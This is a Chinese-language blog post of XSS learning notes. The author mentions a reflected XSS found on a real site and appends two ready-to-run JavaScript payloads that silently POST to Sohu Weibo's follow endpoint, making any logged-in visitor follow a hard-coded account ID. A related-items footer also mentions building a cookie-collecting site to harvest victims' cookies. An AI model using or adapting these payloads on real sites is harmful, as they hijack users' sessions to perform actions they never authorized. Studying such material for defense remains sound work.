`

xss漏洞及其他-学习笔记

 
阅读更多

http://www.wooyun.org/bugs/wooyun-2010-010041

这是今天忙活了下的结果。发现了个比较鸡肋的反射型xss

 

另外还学习了sina app的应用,果然比较爽,各种自己的js文件,在线编辑,非常方便。

 

此外下次blog的任务是

http://www.inbreak.net/archives/389

空虚浪子心的blog非常cool

 

 

附录是两个搜狐微博加关注的js脚本

var xmlHttp=null; 

function createXMLHttpRequest() 
{ 
if(xmlHttp == null){
if(window.XMLHttpRequest) {
//Mozilla 浏览器
xmlHttp = new XMLHttpRequest();
}else if(window.ActiveXObject) {
// IE浏览器
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
}
} 

function openAjax() 
{ 
if( xmlHttp == null)
{ 
createXMLHttpRequest(); 
if( xmlHttp == null)
{
//alert('出错');
return ;
}
} 
xmlHttp.onreadystatechange=xmlHttpChange; 

xmlHttp.open("post","/follow/addfollows",true); 
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");  
xmlHttp.setRequestHeader("X-Requested-With","XMLHttpRequest");  
xmlHttp.send("act=follow&friendids=595824670&type=follow7");
} 

function xmlHttpChange() 
{ 
if(xmlHttp.readyState==4) 
{ 
if(xmlHttp.status==200) 
{ 
  
} 
} 
}  
openAjax();

 

 

传统的js加form提交型

var act = 'follow'; 
//it's icefish冰's weibo
//act=follow&friendids=595824670&type=follow7
var friendids = '595824670'; 
var type='follow7';
           
var sohuAddFollowForm = document.createElement("form");//表单对象   
sohuAddFollowForm.method="post" ;   
sohuAddFollowForm.action = '/follow/addfollows' ;   
       
      var actInput = document.createElement("input") ;  //
      actInput.setAttribute("name", "act") ;   
      actInput.setAttribute("value", act);   
      sohuAddFollowForm.appendChild(actInput) ;   
      
      var friendidsInput = document.createElement("input");// 
      friendidsInput.setAttribute("name","friendids"); 
      friendidsInput.setAttribute("value",friendids); 
      sohuAddFollowForm.appendChild(friendidsInput); 
       
      var typeInput = document.createElement("input");// 
      typeInput.setAttribute("name","type"); 
      typeInput.setAttribute("value",type); 
      sohuAddFollowForm.appendChild(typeInput); 
       
      document.body.appendChild(sohuAddFollowForm) ;   
      sohuAddFollowForm.submit() ;   
      document.body.removeChild(sohuAddFollowForm) ; 
      
 
分享到:
评论

相关推荐

    xss跨站脚本攻击-运维安全详细笔记

    * kali机器上搭建搜集cookie网站,访问xss漏洞网站挂马 * 编写搜集cookie的代码,收集用户的cookie信息 这只是xss跨站脚本攻击的一些基本知识点和实践案例,更多的信息和技术细节需要进一步学习和研究。

    安装xss-labs ppt手册

    为了学习和研究XSS漏洞,XSS-Labs是一个优秀的实践平台,它提供了多种不同类型的XSS挑战,帮助安全从业者提升检测和防御XSS攻击的能力。 **XSS-Labs安装步骤** 1. **下载靶场文件**:首先,你需要找到XSS-Labs的...

    xss game挑战笔记.pdf

    ### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...

    Webgoat学习笔记.zip

    【WebGoat学习笔记】 WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...

    网络安全学习笔记包含sql注入,ssh暴力破解,web漏洞扫描,xss扩展攻击,文件上传攻击等

    网络安全学习笔记包含sql注入,ssh暴力破解,web漏洞扫描,xss扩展攻击,文件上传攻击等

    1026-老师笔记1

    通过审查代码,可以发现潜在的SQL注入、XSS、文件包含和其他安全问题。确保所有用户输入都经过适当的验证和过滤,避免使用不安全的函数,并遵循安全编码最佳实践。 7. 日志分析: 日志分析对于网络安全至关重要,...

    web安全学习笔记.pdf

    "Web 安全学习笔记" Web 安全学习笔记是关于网络安全的综合性学习笔记,涵盖了 Web 安全的基础知识、常见威胁、防御策略等方面的内容。下面将详细介绍该笔记中所涉及的知识点: 一、Web 安全基础 * Web 安全定义...

    e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc

    它包含了SQL注入、跨站脚本(XSS)、盲注等漏洞类型。在Linux系统上,可以通过`yum install`快速搭建LAMP环境,安装Apache(httpd)、MySQL Server、MySQL客户端、PHP以及PHP的GD库,为部署DVWA做好准备。 **实战...

    XSS平台bxss源码

    通过深入研究这个XSS平台的源码,安全专家可以了解XSS漏洞的工作原理,学习如何检测和防御此类攻击,同时也可以定制自己的XSS测试工具,提升网络安全防护能力。对于开发者而言,理解和防范XSS漏洞是构建安全Web应用...

    Web-安全渗透全套教程20XSS跨.zip

    6. 实战演练:可能包含一些练习或项目,让学习者有机会亲手处理XSS漏洞,提升实战技能。 7. 最新趋势:讨论最新的XSS攻击手段和防护技术,以保持学习者的知识与时俱进。 通过这份教程,无论是初级还是高级的Web...

    php常见漏洞及编码安全(附笔记)

    以下是对"php常见漏洞及编码安全"主题的详细解释,以及如何防范这些安全问题。 1. SQL注入:SQL注入是最常见的PHP漏洞之一,发生在开发者未对用户输入的数据进行充分过滤或转义时。攻击者可以通过构造恶意的SQL语句...

    shiro学习笔记

    - **安全最佳实践**:学习如何避免常见的安全漏洞,如CSRF、XSS等,以及如何进行安全配置优化。 这个"shiro学习笔记"涵盖了Shiro的基本使用到高级特性,通过学习,你将能够熟练地运用Shiro来保障你的Web应用的安全...

    ASP实例开发源码-愚人笔记 比较安全的文章管理系统.zip

    其次,安全方面,一个比较安全的文章管理系统应具备防止SQL注入、XSS攻击(跨站脚本攻击)和其他常见web漏洞的机制。在ASP代码中,这通常意味着对用户输入进行适当的验证和清理,使用参数化查询来避免SQL注入,以及...

    OpenRASP学习笔记 .pdf

    OpenRASP适用于各种Java Web应用,如电商平台、金融系统、企业内部应用等,能够有效防止SQL注入、XSS跨站脚本、文件上传漏洞等常见攻击,同时还可以自定义规则,适应特定业务场景下的安全需求。 总结来说,...

    Web安全学习笔记

    《Web安全学习笔记》 在当今数字化的时代,Web安全已经成为每一个互联网用户,特别是开发者和网络安全专业人员必须关注的重要领域。Web安全主要涉及保护Web应用程序免受各种攻击,如SQL注入、跨站脚本(XSS)、跨站...

    Do1ng 个人维护的安全知识框架, 包括但不限于 渗透测试、信息收集、安全工具等相关资源.zip

    注意事项项目本身为整理后的学习笔记,部分内容可能存在瑕疵和纰漏请谅解目前包含安全工具、安全资源、Web安全等相关笔记资源前置学习路线可以参考关于安全的一些学习经历更新时间不定,README 随目录更新而更新,...

    第30天:WEB漏洞-RCE代码及命令执行漏洞全解1

    **WEB漏洞-RCE代码及命令执行漏洞全解** 在Web应用程序的开发过程中,为了实现功能的多样性与便捷性,程序员常常会使用代码调用或命令执行功能。然而,这种做法也可能带来严重的安全风险,即代码执行(RCE,Remote ...

    Python_Study Notes For Web Hacking Web安全学习笔记.zip

    总的来说,这份学习笔记提供了从基础到进阶的Python Web安全知识体系,适合对Web安全感兴趣或者希望提升自己安全技能的开发者。通过深入学习和实践,你不仅可以理解Web安全的原理,还能掌握实际的防护和攻击技巧。

    Web安全学习笔记.pdf

    《Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...

    js学习笔记-恶意代码识别

    此外,还可以结合其他安全策略,如使用Content Security Policy(CSP)限制脚本的来源,使用XSS Filter阻止跨站脚本攻击,以及对所有用户输入进行严格的服务器端验证和过滤。同时,定期更新浏览器和补丁,确保系统...

Global site tag (gtag.js) - Google Analytics